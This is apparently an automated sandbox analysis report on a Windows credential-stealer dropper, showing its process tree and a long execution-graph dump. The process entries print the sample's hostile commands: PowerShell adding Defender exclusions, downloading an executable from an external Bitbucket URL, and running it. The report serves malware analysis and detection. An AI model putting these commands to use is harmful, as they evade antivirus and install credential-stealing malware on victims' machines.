57 e8 ec fe ff ff 3c 01 0f 84 ad 00 00 00 80 3d b0 87 4a 00 00 0f 85 7b 49
                                    Data Ascii: ULSVW=<E@|$$jD\DI=tIuD=hJxE5'HjjjjD$xP=tIvEN=$JyE=tIF`)F=<JmGW<=J{I
Target ID: 0
Start time: 03:02:08
Start date: 24/12/2024
Path: C:\Users\user\Desktop\Gq48hjKhZf.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Gq48hjKhZf.exe"
Imagebase: 0x140000000
File size: 123'392 bytes
MD5 hash: 454BF064C19D363B154A419FC69DC693
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 03:02:09
Start date: 24/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
Imagebase: 0x7ff68b5f0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 03:02:09
Start date: 24/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 03:02:09
Start date: 24/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 03:02:20
Start date: 24/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 03:02:31
Start date: 24/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 03:02:41
Start date: 24/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
Imagebase: 0x7ff68b5f0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 03:02:41
Start date: 24/12/2024
Path: C:\Users\user\AppData\Local\Temp\AHPOBS.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;
Imagebase: 0x400000
File size: 1'136'091 bytes
MD5 hash: A9C526F3A276012D554AC382A90BCA3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 74%, ReversingLabs
• Detection: 71%, Virustotal
Reputation: low
Has exited: false

Execution Graph

Execution Coverage: 7.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 34
9910 1400121c0 GetLastError TlsGetValue SetLastError 9164->9910 9165 14000301f 9167 140012450 4 API calls 9165->9167 9169 14000302e 9167->9169 9168 140002ca9 9911 1400121c0 GetLastError TlsGetValue SetLastError 9168->9911 10020 1400125a0 TlsGetValue 9169->10020 9172 140002cb9 9912 1400121c0 GetLastError TlsGetValue SetLastError 9172->9912 9173 140003039 9175 140012360 HeapFree 9173->9175 9177 140003058 9175->9177 9176 140002cc9 9913 14000ca80 9176->9913 9179 140012360 HeapFree 9177->9179 9181 14000306a 9179->9181 9180 140002cf1 9924 1400125d0 TlsGetValue 9180->9924 9183 140012360 HeapFree 9181->9183 9186 14000307c 9183->9186 9184 140002cfb 9925 140007ef0 9184->9925 9188 140012360 HeapFree 9186->9188 9190 14000308e 9188->9190 9189 140012210 3 API calls 9191 140002d1d 9189->9191 9190->8641 9933 1400121c0 GetLastError TlsGetValue SetLastError 9191->9933 9193 140002d27 9934 1400121c0 GetLastError TlsGetValue SetLastError 9193->9934 9195 140002d3b 9935 1400121c0 GetLastError TlsGetValue SetLastError 9195->9935 9197 140002d4b 9936 1400121c0 GetLastError TlsGetValue SetLastError 9197->9936 9199 140002d5b 9200 14000ca80 5 API calls 9199->9200 9201 140002d86 9200->9201 9937 1400125d0 TlsGetValue 9201->9937 9203 140002d90 9204 140007ef0 5 API calls 9203->9204 9205 140002da3 9204->9205 9206 140012210 3 API calls 9205->9206 9207 140002db2 9206->9207 9938 1400121c0 GetLastError TlsGetValue SetLastError 9207->9938 9209 140002dbc 9939 1400121c0 GetLastError TlsGetValue SetLastError 9209->9939 9211 140002dcc 9940 1400121c0 GetLastError TlsGetValue SetLastError 9211->9940 9213 140002dec 9941 1400121c0 GetLastError TlsGetValue SetLastError 9213->9941 9215 140002e00 9942 1400074e0 9215->9942 9217 140002e24 9957 140012520 TlsGetValue 9217->9957 9219 140002e2d 9958 1400121c0 GetLastError TlsGetValue SetLastError 9219->9958 9221 140002e37 9959 1400121c0 GetLastError TlsGetValue SetLastError 9221->9959 9223 140002e47 9224 1400074e0 9 API calls 9223->9224 9225 140002e6b 9224->9225 9960 
1400125d0 TlsGetValue 9225->9960 9227 140002e75 9961 1400125d0 TlsGetValue 9227->9961 9229 140002e83 9962 14000b758 9229->9962 9231 140002e9b 9232 140012210 3 API calls 9231->9232 9233 140002eaa 9232->9233 9234 1400124c0 wcscmp 9233->9234 9235 140002eb7 9234->9235 9236 140003005 9235->9236 9237 140002ec0 9235->9237 9239 140002930 35 API calls 9236->9239 10002 1400121c0 GetLastError TlsGetValue SetLastError 9237->10002 9239->9257 9240 140002eca 10003 1400121c0 GetLastError TlsGetValue SetLastError 9240->10003 9242 140002ede 10004 1400121c0 GetLastError TlsGetValue SetLastError 9242->10004 9244 140002ef3 10005 1400121c0 GetLastError TlsGetValue SetLastError 9244->10005 9246 140002f07 9247 140007ef0 5 API calls 9246->9247 9248 140002f1c 9247->9248 10006 1400125d0 TlsGetValue 9248->10006 9250 140002f26 9251 140010ba0 6 API calls 9250->9251 9252 140002f3b 9251->9252 9253 140012210 3 API calls 9252->9253 9254 140002f4a 9253->9254 9255 1400124c0 wcscmp 9254->9255 9256 140002f59 9255->9256 9256->9257 10007 1400121c0 GetLastError TlsGetValue SetLastError 9256->10007 10019 1400121c0 GetLastError TlsGetValue SetLastError 9257->10019 9259 140002f6c 10008 1400121c0 GetLastError TlsGetValue SetLastError 9259->10008 9261 140002f85 10009 1400121c0 GetLastError TlsGetValue SetLastError 9261->10009 9263 140002f95 9264 1400074e0 9 API calls 9263->9264 9265 140002fb9 9264->9265 10010 140012520 TlsGetValue 9265->10010 9267 140002fc2 10011 1400125d0 TlsGetValue 9267->10011 9269 140002fce 10012 14000b574 9269->10012 9271 140002fe4 9272 140002930 35 API calls 9271->9272 9272->9257 9274 140001e60 9273->9274 9274->9274 9275 1400123e0 21 API calls 9274->9275 9278 140001e7a 9275->9278 9276 140001f54 10042 1400121c0 GetLastError TlsGetValue SetLastError 9276->10042 9277 1400121c0 GetLastError TlsGetValue SetLastError 9277->9278 9278->9276 9278->9277 9281 140007c90 3 API calls 9278->9281 9288 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9278->9288 9293 140012210 TlsGetValue HeapAlloc 
HeapReAlloc 9278->9293 9280 140001f6e 10043 1400121c0 GetLastError TlsGetValue SetLastError 9280->10043 9281->9278 9283 140001f82 10044 14000d9c4 9283->10044 9286 140012210 3 API calls 9287 140001fa1 GetTempFileNameW 9286->9287 10053 1400121c0 GetLastError TlsGetValue SetLastError 9287->10053 9288->9278 9290 140001fce 10054 1400121c0 GetLastError TlsGetValue SetLastError 9290->10054 9292 140001fe2 10055 14000ca00 9292->10055 9293->9278 9296 140012210 3 API calls 9297 140002008 9296->9297 10061 14000da6c 9297->10061 9303 14000204f 10072 1400121c0 GetLastError TlsGetValue SetLastError 9303->10072 9305 140002063 9306 14000ca00 4 API calls 9305->9306 9307 140002078 9306->9307 9308 140012210 3 API calls 9307->9308 9309 140002089 9308->9309 9310 14000da6c 2 API calls 9309->9310 9311 140002095 9310->9311 9312 14000d914 3 API calls 9311->9312 9313 1400020a1 GetTempFileNameW PathAddBackslashW 9312->9313 10073 1400121c0 GetLastError TlsGetValue SetLastError 9313->10073 9315 1400020dc 10074 1400121c0 GetLastError TlsGetValue SetLastError 9315->10074 9317 1400020f0 9318 14000ca00 4 API calls 9317->9318 9319 140002105 9318->9319 9320 140012210 3 API calls 9319->9320 9321 140002116 9320->9321 9322 14000da6c 2 API calls 9321->9322 9323 140002122 PathRenameExtensionW GetTempFileNameW 9322->9323 10075 1400121c0 GetLastError TlsGetValue SetLastError 9323->10075 9325 140002162 10076 1400121c0 GetLastError TlsGetValue SetLastError 9325->10076 9327 140002176 9328 14000ca00 4 API calls 9327->9328 9329 14000218b 9328->9329 9330 140012210 3 API calls 9329->9330 9331 14000219c 9330->9331 9332 140012360 HeapFree 9331->9332 9333 1400021ba 9332->9333 9334 140012360 HeapFree 9333->9334 9335 1400021cc 9334->9335 9336 140012360 HeapFree 9335->9336 9337 1400021de 9336->9337 9338 1400067aa 9337->9338 9339 1400123e0 21 API calls 9338->9339 9356 1400067c2 9339->9356 9340 14000689c 10078 1400121c0 GetLastError TlsGetValue SetLastError 9340->10078 9342 1400068a6 10079 1400121c0 GetLastError 
TlsGetValue SetLastError 9342->10079 9344 1400068b6 9347 1400049ea 86 API calls 9344->9347 9345 140007c90 3 API calls 9345->9356 9346 140012210 TlsGetValue HeapAlloc HeapReAlloc 9346->9356 9348 1400068e8 9347->9348 9350 140012210 3 API calls 9348->9350 9349 1400121c0 GetLastError TlsGetValue SetLastError 9349->9356 9351 1400068f7 9350->9351 10080 14000dc88 9351->10080 9352 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9352->9356 9355 140012360 HeapFree 9357 140006913 9355->9357 9356->9340 9356->9345 9356->9346 9356->9349 9356->9352 9358 140012360 HeapFree 9357->9358 9359 140006925 9358->9359 9360 140012360 HeapFree 9359->9360 9361 14000633a 9360->9361 9362 1400121c0 GetLastError TlsGetValue SetLastError 9361->9362 9362->8647 9363->8649 9365 1400123e0 21 API calls 9364->9365 9366 140004a05 9365->9366 9367 1400122f0 2 API calls 9366->9367 9368 140004a22 9367->9368 9369 140004a33 9368->9369 9370 140004a79 9368->9370 10085 1400121c0 GetLastError TlsGetValue SetLastError 9369->10085 9371 140004ac2 9370->9371 9372 140004a86 9370->9372 9375 140004b1b 9371->9375 9376 140004acf 9371->9376 10087 1400121c0 GetLastError TlsGetValue SetLastError 9372->10087 9379 140004b74 9375->9379 9380 140004b28 9375->9380 10088 1400121c0 GetLastError TlsGetValue SetLastError 9376->10088 9377 140004a3d 10086 1400121c0 GetLastError TlsGetValue SetLastError 9377->10086 9378 140004a97 9383 140012450 4 API calls 9378->9383 9387 140004b81 9379->9387 9388 140004bcd 9379->9388 10106 1400121c0 GetLastError TlsGetValue SetLastError 9380->10106 9390 140004aa6 9383->9390 9385 140004ad9 10089 1400121c0 GetLastError TlsGetValue SetLastError 9385->10089 9386 140004a4d 9395 14000daa8 5 API calls 9386->9395 10108 1400121c0 GetLastError TlsGetValue SetLastError 9387->10108 9392 140004c26 9388->9392 9393 140004bda 9388->9393 9399 140012210 3 API calls 9390->9399 9391 140004b32 10107 1400121c0 GetLastError TlsGetValue SetLastError 9391->10107 9397 140004c33 9392->9397 9398 140004c7f 9392->9398 10110 
1400121c0 GetLastError TlsGetValue SetLastError 9393->10110 9403 140004a5d 9395->9403 9396 140004b8b 10109 1400121c0 GetLastError TlsGetValue SetLastError 9396->10109 10112 1400121c0 GetLastError TlsGetValue SetLastError 9397->10112 9410 140004cd8 9398->9410 9411 140004c8c 9398->9411 9413 140004a70 9399->9413 9402 140004ae9 10090 14000db18 9402->10090 9405 140012210 3 API calls 9403->9405 9405->9413 9408 140004b42 9418 14000db18 17 API calls 9408->9418 9409 140004be4 10111 1400121c0 GetLastError TlsGetValue SetLastError 9409->10111 9416 140004d31 9410->9416 9417 140004ce5 9410->9417 10114 1400121c0 GetLastError TlsGetValue SetLastError 9411->10114 10083 1400121c0 GetLastError TlsGetValue SetLastError 9413->10083 9414 140004b9b 9424 14000db18 17 API calls 9414->9424 9415 140004c3d 10113 1400121c0 GetLastError TlsGetValue SetLastError 9415->10113 9421 140004d8a 9416->9421 9422 140004d3e 9416->9422 10116 1400121c0 GetLastError TlsGetValue SetLastError 9417->10116 9428 140004b58 9418->9428 9437 140004e3a 9421->9437 9438 140004d9b 9421->9438 10118 1400121c0 GetLastError TlsGetValue SetLastError 9422->10118 9423 140012210 3 API calls 9491 140004b12 9423->9491 9433 140004bb1 9424->9433 9439 140012210 3 API calls 9428->9439 9429 140004bf4 9440 14000db18 17 API calls 9429->9440 9430 140004c96 10115 1400121c0 GetLastError TlsGetValue SetLastError 9430->10115 9443 140012210 3 API calls 9433->9443 9434 140004c4d 9444 14000db18 17 API calls 9434->9444 9435 140004e8b 9445 140012450 4 API calls 9435->9445 9436 140004cef 10117 1400121c0 GetLastError TlsGetValue SetLastError 9436->10117 10146 1400121c0 GetLastError TlsGetValue SetLastError 9437->10146 10120 1400121c0 GetLastError TlsGetValue SetLastError 9438->10120 9439->9491 9449 140004c0a 9440->9449 9441 140004ca6 9451 14000db18 17 API calls 9441->9451 9442 140004d48 10119 1400121c0 GetLastError TlsGetValue SetLastError 9442->10119 9443->9491 9453 140004c63 9444->9453 9454 140004e9a 9445->9454 9450 140012210 3 API calls 
9449->9450 9450->9491 9459 140004cbc 9451->9459 9461 140012210 3 API calls 9453->9461 10084 1400125a0 TlsGetValue 9454->10084 9455 140004cff 9463 14000db18 17 API calls 9455->9463 9456 140004da5 10121 1400121c0 GetLastError TlsGetValue SetLastError 9456->10121 9457 140004e44 10147 1400121c0 GetLastError TlsGetValue SetLastError 9457->10147 9466 140012210 3 API calls 9459->9466 9460 140004d58 9467 14000db18 17 API calls 9460->9467 9461->9491 9469 140004d15 9463->9469 9465 140004e54 9472 14000daa8 5 API calls 9465->9472 9466->9491 9473 140004d6e 9467->9473 9468 140004ea5 9478 140012360 HeapFree 9468->9478 9474 140012210 3 API calls 9469->9474 9470 140004db5 10122 14000bc94 9470->10122 9476 140004e64 9472->9476 9477 140012210 3 API calls 9473->9477 9474->9491 9480 140012210 3 API calls 9476->9480 9477->9491 9481 140004ec4 9478->9481 9479 140012210 3 API calls 9483 140004dea 9479->9483 9480->9413 9482 140012360 HeapFree 9481->9482 9484 140004ed6 9482->9484 9485 1400124c0 wcscmp 9483->9485 9484->8652 9486 140004dff 9485->9486 9487 140004e21 9486->9487 9488 140004e08 9486->9488 9490 140002930 35 API calls 9487->9490 10143 140007364 9488->10143 9490->9491 9491->9413 9492->8656 9493->8658 9494->8660 9496 1400123e0 21 API calls 9495->9496 9497 140003cde 9496->9497 9498 1400122f0 2 API calls 9497->9498 9499 140003cfb 9498->9499 10156 1400121c0 GetLastError TlsGetValue SetLastError 9499->10156 9501 140003d2f 10157 1400121c0 GetLastError TlsGetValue SetLastError 9501->10157 9503 140003d43 9504 14000ca80 5 API calls 9503->9504 9505 140003d5f 9504->9505 9506 140012210 3 API calls 9505->9506 9507 140003d6e 9506->9507 10158 1400121c0 GetLastError TlsGetValue SetLastError 9507->10158 9509 140003d87 9510 140012450 4 API calls 9509->9510 9511 140003d96 9510->9511 10159 1400125a0 TlsGetValue 9511->10159 9513 140003da1 9514 140012360 HeapFree 9513->9514 9515 140003dc0 9514->9515 9516 140012360 HeapFree 9515->9516 9517 140003dd2 9516->9517 9518 140012520 TlsGetValue 9517->9518 
9518->8664 9519->8666 9521 14000c468 SetEnvironmentVariableW 9520->9521 9522 14000c47c 9520->9522 9521->9522 9522->8668 9523->8670 9524->8678 9525->8680 9527 1400123e0 21 API calls 9526->9527 9528 1400026d1 9527->9528 10160 1400121c0 GetLastError TlsGetValue SetLastError 9528->10160 9530 1400026e5 10161 1400121c0 GetLastError TlsGetValue SetLastError 9530->10161 9532 1400026f9 9533 14000c0c4 5 API calls 9532->9533 9534 140002709 9533->9534 9535 140012210 3 API calls 9534->9535 9536 140002718 9535->9536 9537 1400027c0 9536->9537 9538 140002730 9536->9538 10227 1400121c0 GetLastError TlsGetValue SetLastError 9537->10227 10162 1400121c0 GetLastError TlsGetValue SetLastError 9538->10162 9541 14000273a 10163 1400121c0 GetLastError TlsGetValue SetLastError 9541->10163 9542 1400027cf 9543 140012450 4 API calls 9542->9543 9545 1400027de 9543->9545 9547 140012210 3 API calls 9545->9547 9546 14000274a 10164 1400031f5 9546->10164 9550 1400027be 9547->9550 10228 1400121c0 GetLastError TlsGetValue SetLastError 9550->10228 9551 140012210 3 API calls 9553 140002768 9551->9553 10226 1400121c0 GetLastError TlsGetValue SetLastError 9553->10226 9554 1400027fc 9556 140012450 4 API calls 9554->9556 9558 14000280b 9556->9558 9557 140002777 9559 140012450 4 API calls 9557->9559 10229 1400125a0 TlsGetValue 9558->10229 9561 140002786 9559->9561 9563 140012450 4 API calls 9561->9563 9562 140002816 9564 140012360 HeapFree 9562->9564 9565 14000279d 9563->9565 9566 140002835 9564->9566 9567 140012450 4 API calls 9565->9567 9568 140012360 HeapFree 9566->9568 9569 1400027af 9567->9569 9570 140002847 9568->9570 9571 140012210 3 API calls 9569->9571 9570->8683 9571->9550 9573 140004eeb 9572->9573 9573->9573 9574 1400123e0 21 API calls 9573->9574 9593 140004f05 9574->9593 9575 140004fdf 10253 1400121c0 GetLastError TlsGetValue SetLastError 9575->10253 9577 140004fe9 10254 1400121c0 GetLastError TlsGetValue SetLastError 9577->10254 9578 1400121c0 GetLastError TlsGetValue SetLastError 9578->9593 9580 
140004ffd 10255 1400121c0 GetLastError TlsGetValue SetLastError 9580->10255 9581 140007c90 3 API calls 9581->9593 9583 14000500d 10256 1400121c0 GetLastError TlsGetValue SetLastError 9583->10256 9584 140012210 TlsGetValue HeapAlloc HeapReAlloc 9584->9593 9586 14000501d 9587 140010ba0 6 API calls 9586->9587 9588 14000503b 9587->9588 10257 1400125d0 TlsGetValue 9588->10257 9589 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9589->9593 9591 140005045 9592 140007dc0 6 API calls 9591->9592 9594 140005058 9592->9594 9593->9575 9593->9578 9593->9581 9593->9584 9593->9589 9595 140012210 3 API calls 9594->9595 9596 140005067 9595->9596 10258 1400121c0 GetLastError TlsGetValue SetLastError 9596->10258 9598 140005071 10259 1400121c0 GetLastError TlsGetValue SetLastError 9598->10259 9600 140005085 10260 1400121c0 GetLastError TlsGetValue SetLastError 9600->10260 9602 140005095 10261 1400121c0 GetLastError TlsGetValue SetLastError 9602->10261 9604 1400050a5 9605 140010ba0 6 API calls 9604->9605 9606 1400050c3 9605->9606 10262 1400125d0 TlsGetValue 9606->10262 9608 1400050cd 9609 140007dc0 6 API calls 9608->9609 9610 1400050e0 9609->9610 9611 140012210 3 API calls 9610->9611 9612 1400050ef 9611->9612 10263 1400121c0 GetLastError TlsGetValue SetLastError 9612->10263 9614 1400050f9 10264 1400121c0 GetLastError TlsGetValue SetLastError 9614->10264 9616 14000510d 10265 1400121c0 GetLastError TlsGetValue SetLastError 9616->10265 9618 14000511d 10266 1400121c0 GetLastError TlsGetValue SetLastError 9618->10266 9620 14000512d 9621 140010ba0 6 API calls 9620->9621 9622 140005149 9621->9622 10267 1400125d0 TlsGetValue 9622->10267 9624 140005153 9625 140007dc0 6 API calls 9624->9625 9626 140005166 9625->9626 9627 140012210 3 API calls 9626->9627 9628 140005175 9627->9628 10268 1400121c0 GetLastError TlsGetValue SetLastError 9628->10268 9630 14000517f 10269 1400121c0 GetLastError TlsGetValue SetLastError 9630->10269 9632 140005193 10270 1400121c0 GetLastError TlsGetValue SetLastError 
9632->10270 9634 1400051a3 10271 1400121c0 GetLastError TlsGetValue SetLastError 9634->10271 9636 1400051b3 9637 140010ba0 6 API calls 9636->9637 9638 1400051d2 9637->9638 10272 1400125d0 TlsGetValue 9638->10272 9640 1400051dc 9641 140007dc0 6 API calls 9640->9641 9642 1400051ef 9641->9642 9643 140012210 3 API calls 9642->9643 9644 1400051fe 9643->9644 10273 1400121c0 GetLastError TlsGetValue SetLastError 9644->10273 9646 140005208 10274 1400121c0 GetLastError TlsGetValue SetLastError 9646->10274 9648 14000521c 10275 1400121c0 GetLastError TlsGetValue SetLastError 9648->10275 9650 14000522c 10276 1400121c0 GetLastError TlsGetValue SetLastError 9650->10276 9652 14000523c 9653 140010ba0 6 API calls 9652->9653 9654 14000525b 9653->9654 10277 1400125d0 TlsGetValue 9654->10277 9656 140005265 9657 140007dc0 6 API calls 9656->9657 9658 140005278 9657->9658 9659 140012210 3 API calls 9658->9659 9660 140005287 9659->9660 10278 1400121c0 GetLastError TlsGetValue SetLastError 9660->10278 9662 140005291 10279 1400121c0 GetLastError TlsGetValue SetLastError 9662->10279 9664 1400052a1 10280 140005794 9664->10280 9666 1400052be 10313 1400121c0 GetLastError TlsGetValue SetLastError 9666->10313 9668 1400052dc 10314 1400121c0 GetLastError TlsGetValue SetLastError 9668->10314 9670 1400052ec 9671 140005794 69 API calls 9670->9671 9672 140005306 9671->9672 9673 140012210 3 API calls 9672->9673 9674 140005317 9673->9674 10315 1400121c0 GetLastError TlsGetValue SetLastError 9674->10315 9676 140005321 10316 1400121c0 GetLastError TlsGetValue SetLastError 9676->10316 9678 140005331 9679 140005794 69 API calls 9678->9679 9680 14000534b 9679->9680 9681 140012210 3 API calls 9680->9681 9682 14000535a 9681->9682 10317 1400121c0 GetLastError TlsGetValue SetLastError 9682->10317 9684 140005364 10318 1400121c0 GetLastError TlsGetValue SetLastError 9684->10318 9686 140005374 9687 140005794 69 API calls 9686->9687 9688 14000538e 9687->9688 9689 140012210 3 API calls 9688->9689 9690 1400053a0 
9689->9690 10319 1400121c0 GetLastError TlsGetValue SetLastError 9690->10319 9692 1400053aa 10320 1400121c0 GetLastError TlsGetValue SetLastError 9692->10320 9694 1400053ba 9695 140005794 69 API calls 9694->9695 9696 1400053d4 9695->9696 9697 140012210 3 API calls 9696->9697 9698 1400053e6 9697->9698 10321 1400121c0 GetLastError TlsGetValue SetLastError 9698->10321 9700 1400053f0 10322 1400121c0 GetLastError TlsGetValue SetLastError 9700->10322 9702 140005404 10323 1400121c0 GetLastError TlsGetValue SetLastError 9702->10323 9704 140005414 10324 1400121c0 GetLastError TlsGetValue SetLastError 9704->10324 9706 140005428 9707 140003cc9 37 API calls 9706->9707 9708 14000543e 9707->9708 10325 140012520 TlsGetValue 9708->10325 9710 140005447 10326 1400125d0 TlsGetValue 9710->10326 9712 14000545f 10327 1400081d0 9712->10327 9715 140012210 3 API calls 9716 140005486 9715->9716 10330 1400121c0 GetLastError TlsGetValue SetLastError 9716->10330 9718 140005490 10331 1400121c0 GetLastError TlsGetValue SetLastError 9718->10331 9720 1400054a4 10332 1400121c0 GetLastError TlsGetValue SetLastError 9720->10332 9722 1400054b4 10333 1400121c0 GetLastError TlsGetValue SetLastError 9722->10333 9724 1400054c8 9725 140003cc9 37 API calls 9724->9725 9726 1400054de 9725->9726 10334 140012520 TlsGetValue 9726->10334 9728 1400054e7 10335 1400125d0 TlsGetValue 9728->10335 9730 1400054ff 9731 1400081d0 13 API calls 9730->9731 9732 140005517 9731->9732 9733 140012210 3 API calls 9732->9733 9734 140005526 9733->9734 10336 1400121c0 GetLastError TlsGetValue SetLastError 9734->10336 9736 140005530 10337 1400121c0 GetLastError TlsGetValue SetLastError 9736->10337 9738 140005549 9739 140012450 4 API calls 9738->9739 9740 140005558 9739->9740 9741 140012450 4 API calls 9740->9741 9742 14000556f 9741->9742 9743 140012450 4 API calls 9742->9743 9744 140005584 9743->9744 9745 140012450 4 API calls 9744->9745 9746 140005599 9745->9746 9747 140012450 4 API calls 9746->9747 9748 1400055ae 9747->9748 10338 
140012520 TlsGetValue 9748->10338 9750 1400055b7 10339 1400125d0 TlsGetValue 9750->10339 9752 1400055c3 10340 14000309a 9752->10340 9754 1400055d7 9755 140012360 HeapFree 9754->9755 9756 1400055fd 9755->9756 9757 140012360 HeapFree 9756->9757 9758 14000560f 9757->9758 9759 140012360 HeapFree 9758->9759 9760 140005621 9759->9760 9761 140012360 HeapFree 9760->9761 9762 140005633 9761->9762 9763 140012360 HeapFree 9762->9763 9764 140005648 9763->9764 9765 140012360 HeapFree 9764->9765 9766 14000565a 9765->9766 9767 140012360 HeapFree 9766->9767 9768 14000566f 9767->9768 9769 140012360 HeapFree 9768->9769 9770 140005681 9769->9770 9771 140012360 HeapFree 9770->9771 9772 140005693 9771->9772 9773 140012360 HeapFree 9772->9773 9774 1400056a5 9773->9774 9775 1400121c0 GetLastError TlsGetValue SetLastError 9774->9775 9775->8688 9776->8694 9777->8710 9778->8712 9779->8720 9780->8722 9781->8724 9783 1400126d0 3 API calls 9782->9783 9784 14000daca GetCurrentDirectoryW 9783->9784 9785 14000dae1 9784->9785 10471 140012900 TlsGetValue 9785->10471 9787 14000663c 9788 140012520 TlsGetValue 9787->9788 9788->8728 9789->8730 9790->8736 9791->8738 9792->8740 9794 1400029e1 9793->9794 9794->9794 9795 1400123e0 21 API calls 9794->9795 9796 1400029fb 9795->9796 9797 1400122f0 2 API calls 9796->9797 9798 140002a11 9797->9798 9799 1400122f0 2 API calls 9798->9799 9800 140002a2b 9799->9800 9801 1400122f0 2 API calls 9800->9801 9802 140002a45 9801->9802 9803 140007364 2 API calls 9802->9803 9805 140002af8 9802->9805 9804 140002ac7 GetExitCodeProcess 9803->9804 9804->9802 9806 140012360 HeapFree 9805->9806 9807 140002b18 9806->9807 9808 140012360 HeapFree 9807->9808 9809 140002b2a 9808->9809 9813 1400072c5 EnterCriticalSection 9812->9813 9814 140006598 9812->9814 9821 140007309 9813->9821 9814->8707 9815 140007313 9818 140011cb0 HeapAlloc 9815->9818 9816 1400072db WaitForSingleObject 9817 1400072ee CloseHandle 9816->9817 9816->9821 9820 140011c68 HeapFree 9817->9820 9819 140007336 
LeaveCriticalSection 9818->9819 9819->9814 9820->9821 9821->9815 9821->9816 9823 140003dea 9822->9823 9823->9823 9824 1400123e0 21 API calls 9823->9824 9825 140003e04 9824->9825 9826 1400122f0 2 API calls 9825->9826 9827 140003e17 9826->9827 9828 140003e6d 9827->9828 10472 1400121c0 GetLastError TlsGetValue SetLastError 9827->10472 10474 1400121c0 GetLastError TlsGetValue SetLastError 9828->10474 9831 140003e77 10475 1400121c0 GetLastError TlsGetValue SetLastError 9831->10475 9832 140003e30 10473 1400121c0 GetLastError TlsGetValue SetLastError 9832->10473 9835 140003e8b 10476 1400121c0 GetLastError TlsGetValue SetLastError 9835->10476 9836 140003e44 9838 14000ca00 4 API calls 9836->9838 9840 140003e5e 9838->9840 9839 140003e9b 10477 1400121c0 GetLastError TlsGetValue SetLastError 9839->10477 9842 140012210 3 API calls 9840->9842 9842->9828 9843 140003eab 9844 140010ba0 6 API calls 9843->9844 9845 140003ec7 9844->9845 10478 1400125d0 TlsGetValue 9845->10478 9847 140003ed1 9848 140007dc0 6 API calls 9847->9848 9849 140003ee4 9848->9849 9850 140012210 3 API calls 9849->9850 9851 140003ef3 FindResourceW 9850->9851 9852 140003f1c 9851->9852 9853 14000402d 9851->9853 9854 14000350f 21 API calls 9852->9854 9855 1400124c0 wcscmp 9853->9855 9856 140003f2d 9854->9856 9857 14000403c 9855->9857 9862 140001284 8 API calls 9856->9862 9858 140004067 9857->9858 9859 14000404c 9857->9859 9860 140004070 9857->9860 9863 140012360 HeapFree 9858->9863 9864 140007284 7 API calls 9859->9864 10483 140003592 9860->10483 9865 140003f66 9862->9865 9866 14000408e 9863->9866 9864->9858 10479 1400121c0 GetLastError TlsGetValue SetLastError 9865->10479 9868 140012360 HeapFree 9866->9868 9870 1400040a0 9868->9870 9869 140003f70 10480 1400121c0 GetLastError TlsGetValue SetLastError 9869->10480 9870->8707 9872 140003f84 9873 14000ca80 5 API calls 9872->9873 9874 140003fa1 9873->9874 9875 140012210 3 API calls 9874->9875 9876 140003fb2 9875->9876 10481 1400121c0 GetLastError TlsGetValue SetLastError 
